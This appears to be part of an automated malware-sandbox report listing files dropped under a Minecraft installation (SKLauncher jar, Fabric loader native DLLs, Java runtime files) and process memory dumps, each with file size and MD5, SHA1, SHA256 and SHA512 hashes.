84d2102ad171863db04e7ee22a259d1f6c5de4a5

SHA256
d255311b0a181e243de326d111502a8b1dc7277b534a295a8340ab5230e74c83

SHA512
1a305bc333c7c2055a334dc67734db587fd6fda457b46c8df8f17ded0a8982e3830970bee75cc17274aa0a4082f32792b5dbff88410fa43cc61b55c1dce4c129

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\runtime\java-runtime-delta\legal\jdk.naming.rmi\ASSEMBLY_EXCEPTION

Filesize
43B

MD5
bd468da51b15a9f09778545b00265f34

SHA1
c80e4bab46e34d02826eab226a4441d0970f2aba

SHA256
7901499314e881a978d80a31970f0daec92d4995f3305e31fb53c38d9cc6ec3b

SHA512
2c1d43c3e17bb2fca24a77bea3d2b3954a47da92e0cdd0738509bffcdbe2935c11764cd5af50439061638bba8b8d59da29e97ea7404ea605f7575fc13395ca93

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\runtime\java-runtime-delta\lib\jvm.cfg

Filesize
29B

MD5
7ce21bdcfa333c231d74a77394206302

SHA1
c5a940d2dee8e7bfc01a87d585ddca420d37e226

SHA256
aa9efb969444c1484e29adecab55a122458090616e766b2f1230ef05bc3867e0

SHA512
8b37a1a5600e0a4e5832021c4db50569e33f1ddc8ac4fc2f38d5439272b955b0e3028ea10dec0743b197aa0def32d9e185066d2bac451f81b99539d34006074b

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\runtime\minecraft-java-exe\MinecraftJava.exe

Filesize
67KB

MD5
575230bd0c50dac003d275dab323d2f9

SHA1
4f97aff9b52b3d2736993a35f9fea303c3e09cda

SHA256
6e7dcf3dca0f14a9d2e1a20af11c400bf4164e02708d819768fcc4231b4f4ba2

SHA512
b9d3ff63f982592f6e28f17eeaadf0549cfbb8e5268ef1dabc763f42b6a27f1f1e1bafe3e901215e95431de5f2ac5abf515864898d8aef5c38deb7a7abfeda32

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\sklauncher-fx.jar

Filesize
16.3MB

MD5
2ab27c8ae56c526c886fc20dc2ac30ec

SHA1
a1df2050a619573e5a37469c669280b9bd791d78

SHA256
575706c1cf50b9c9ddebb595661b3e90a4f43c7b264e060a15389752b1ccb121

SHA512
bd0205d159759d0e2b71e5fcff51e2c5f4965597086bfffe6d197faef665e944efa2d841fbd93c83928353ccc45c915f87a2104d038464104c8682a0310d2d94

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470\glfw.dll

Filesize
484KB

MD5
8cabdbe3d67546771b02af5d42073cfe

SHA1
2e19147110b9872a52814956bab151a7aa80ce58

SHA256
affa7e54eb0dedce4a5721c327c1a16035edbbd039cd402e08107d6d2d55eb1a

SHA512
b7f46feef779e5772fc7711fda601fdda6ee4bf41d4fb87735a0b8fdc5fdbbdab23ba1760989e15d66cf9ba65409933cbce858eda169d04f13f401198245ad1f

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470\jemalloc.dll

Filesize
389KB

MD5
e58d41175587d4355fe06bf8b8a1ab32

SHA1
6403f8243ea983a225b3bcda6c821a0029ad9ee2

SHA256
9abf0095066ebab37b78968e11370a8078313e48cb5be8eda01f67623c6a6248

SHA512
fc432ddb67dce8a672ac268d25f01d40c1d614e4ef34cbac6c4a2c01742ebab5d00c7ef5d9f0ef46ce0b3b6a4d5ace581fcf8c247d492c3882f561015d9e2ae4

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470\jna5576586191879955860.dll

Filesize
248KB

MD5
719d6ba1946c25aa61ce82f90d77ffd5

SHA1
94d2191378cac5719daecc826fc116816284c406

SHA256
69c45175ecfd25af023f96ac0bb2c45e6a95e3ba8a5a50ee7969ccab14825c44

SHA512
119152b624948b76921aa91a5024006ef7c8fdbfe5f6fe71b1ec9f2c0e504b22508ff438c4183e60fa8de93eb35a8c7ccdda3a686e3c2f65c8185f1dd2ef248b

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470\lwjgl.dll

Filesize
468KB

MD5
d8ea3886d9f59b514bfa5b24ab69c0ab

SHA1
2bf57942dff5360889f0e89c58d5acdc54e5f1ea

SHA256
a39adf52947fafd954c2a86ce031abb8c59825f7ee50337ac8c41e4280abe82d

SHA512
ba8af0415c7b0454dd8bdccf78ed59da3bb5cc5f631dd060d3cd0eaf74d8f55d7531248b6b8a995ba5b672dc0386d3fa198e8c761f2e1cc0304da0dc029bf29e

Download Submit
C:\Users\Admin\AppData\Roaming\.minecraft\versions\fabric-loader-0.16.7-1.21\fabric-loader-0.16.7-1.21-natives-930977914470\lwjgl_tinyfd.dll

Filesize
246KB

MD5
e7349669dee3093d266849685efecc60

SHA1
e7c3d94ad9d83f0762dfd82780d2a683d5d9b3c0

SHA256
ec7d76e6ef7a99628ef6f8b6e544294b700108c341837779e6e2c01c0bc3da9c

SHA512
41d772a4a9673db43a4584af78d5c128278b27efc01b7da47a9f8f629fd004aa8e4c63186d93b6cb7b664325272f0a291a1e80d9ae799910989171c1cdec34c8

Download Submit
\??\pipe\crashpad_2936_BLDQNTRKISHZSMYW

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1320-296-0x00000295215F0000-0x00000295215F1000-memory.dmp

Filesize
4KB

Download
memory/1452-548-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-450-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-557-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-546-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-534-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-313-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-348-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-391-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-525-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-550-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-497-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-505-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-510-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/1452-521-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/4672-284-0x000002354C4B0000-0x000002354C4B1000-memory.dmp

Filesize
4KB

Download
memory/13636-23556-0x0000022EF3AC0000-0x0000022EF3AE2000-memory.dmp

Filesize
136KB

Download
memory/13636-23567-0x0000022EF3DC0000-0x0000022EF3EC2000-memory.dmp

Filesize
1.0MB

Download
memory/13636-23555-0x0000022EF3B20000-0x0000022EF3BA2000-memory.dmp

Filesize
520KB

Download
memory/13636-23566-0x0000022EF3AB0000-0x0000022EF3AC0000-memory.dmp

Filesize
64KB

Download
memory/14296-23662-0x000001F067B60000-0x000001F067B7E000-memory.dmp

Filesize
120KB

Download
memory/14296-23699-0x000001F06A1B0000-0x000001F06A1C2000-memory.dmp

Filesize
72KB

Download
memory/14296-23673-0x000001F06AF40000-0x000001F06B26E000-memory.dmp

Filesize
3.2MB

Download
memory/14296-23672-0x000001F067BD0000-0x000001F067BF6000-memory.dmp

Filesize
152KB

Download
memory/14296-23671-0x000001F06A170000-0x000001F06A1AA000-memory.dmp

Filesize
232KB

Download
memory/14296-23668-0x000001F067B50000-0x000001F067B5C000-memory.dmp

Filesize
48KB

Download
memory/14296-23667-0x000001F06A0A0000-0x000001F06A0F0000-memory.dmp

Filesize
320KB

Download
memory/14296-23666-0x000001F069FA0000-0x000001F06A052000-memory.dmp

Filesize
712KB

Download
memory/14296-23663-0x000001F069CB0000-0x000001F069D1A000-memory.dmp

Filesize
424KB

Download
memory/14296-23660-0x000001F067B90000-0x000001F067BD0000-memory.dmp

Filesize
256KB

Download
memory/14296-23658-0x000001F069C30000-0x000001F069CA6000-memory.dmp

Filesize
472KB

Download
memory/14296-23657-0x000001F067B80000-0x000001F067B8A000-memory.dmp

Filesize
40KB

Download
memory/14296-23653-0x000001F0671A0000-0x000001F06773A000-memory.dmp

Filesize
5.6MB

Download